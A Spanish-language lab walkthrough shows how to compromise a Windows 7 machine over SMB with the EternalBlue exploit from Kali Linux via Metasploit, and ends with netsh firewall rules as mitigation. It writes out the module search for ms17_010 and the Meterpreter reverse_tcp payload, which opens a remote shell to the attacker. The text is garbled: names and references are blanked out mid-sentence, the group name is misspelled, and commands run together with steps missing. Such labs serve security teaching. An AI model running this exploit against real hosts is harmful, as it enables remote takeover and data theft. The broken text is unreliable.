
Guía de laboratorio paso a paso que demuestra el exploit EternalBlue (CVE-2017-0144) contra el protocolo SMB de Windows 7 usando Metasploit, incluyendo pasos de configuración, explotación y mitigación.
LAB: ATAQUE AL SISTEMA OPERATIVO WINDOWS BASADO EN LA VULNERABILIDAD DEL PROTOCOLO SMB.
En este laboratorio usaremos dos computadoras para simular un ataque basado en la vulnerabilidad del protocolo SMB del sistema operativo Windows. Una máquina ejecuta el sistema operativo Kali Linux, que desempeña el papel del atacante (hacker). Y otra computadora actúa como la máquina víctima. La máquina víctima ejecuta el sistema operativo Windows 7 de 64 bits, que contiene la vulnerabilidad SMB. Para lograrlo, en la máquina Kali Linux usaremos el exploit llamado EternalBlue para atacar la máquina Windows 7.
Server Message Block (SMB) es un protocolo de uso compartido de archivos bastante común en la plataforma Windows de Microsoft. Gracias a este protocolo SMB, las computadoras Windows conectadas entre sí en la misma red o en el mismo dominio pueden compartir archivos entre ellas. Hasta hoy, SMB también se conoce como Common Internet File Sharing (CIFS).
EternalBlue es un exploit que aprovecha la vulnerabilidad del protocolo SMB a través del puerto 445. Inicialmente, EternalBlue fue desarrollado por la Agencia de Seguridad Nacional de los Estados Unidos (NSA). Su nombre completo en inglés es U.S. National Security Agency. Pero luego fue filtrado por el grupo Hacker The Shadow Brokens en 2017. Ese mismo año se produjo un ataque a gran escala del virus de cifrado de datos – ransomware, dirigido a las computadoras Windows de Microsoft, en todo el mundo. Entre ellos, el más famoso fue el virus . Hasta la fecha, aunque esta vulnerabilidad ha sido parcheada por Microsoft mediante la actualización de seguridad . Sin embargo, en el mundo, una gran cantidad de computadoras que ejecutan el sistema operativo Windows todavía presentan esta vulnerabilidad. Esta vulnerabilidad fue publicada en . (Windows SMB Remote Code Execution Vulnerability). Esta vulnerabilidad es extremadamente peligrosa y muy fácil de explotar. Lo destacable es que para atacar a través de esta vulnerabilidad del protocolo SMB, el hacker no necesita enviar ni engañar a la víctima para que descargue o ejecute ningún virus malicioso. Es decir, la víctima, incluso si no hace nada, puede ser atacada fácilmente por el hacker, quien toma el control de la computadora sin que ella se dé cuenta.
Prepara 02 máquinas virtuales que se ejecutan en el software VMware Workstation:

En la máquina virtual Kali (atacante):
ifconfigservice postgresql startservice postgresql statusEn la máquina virtual Windows 7 (víctima):
ipconfigmsfconsole
search ms17_010
use 0 -> set payload windows/x64/meterpreter/reverse_tcp

=>En este punto, se considera que el hacker ha logrado infiltrarse en la máquina víctima. En este momento, el hacker puede borrar y robar archivos de la máquina de la víctima sin que ella lo sepa. Incluso puede subir y ejecutar virus directamente en ella.
Para evitar ser explotado y que se aprovechen del protocolo SMB, debemos realizar las siguientes tareas:
netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_Cong_445"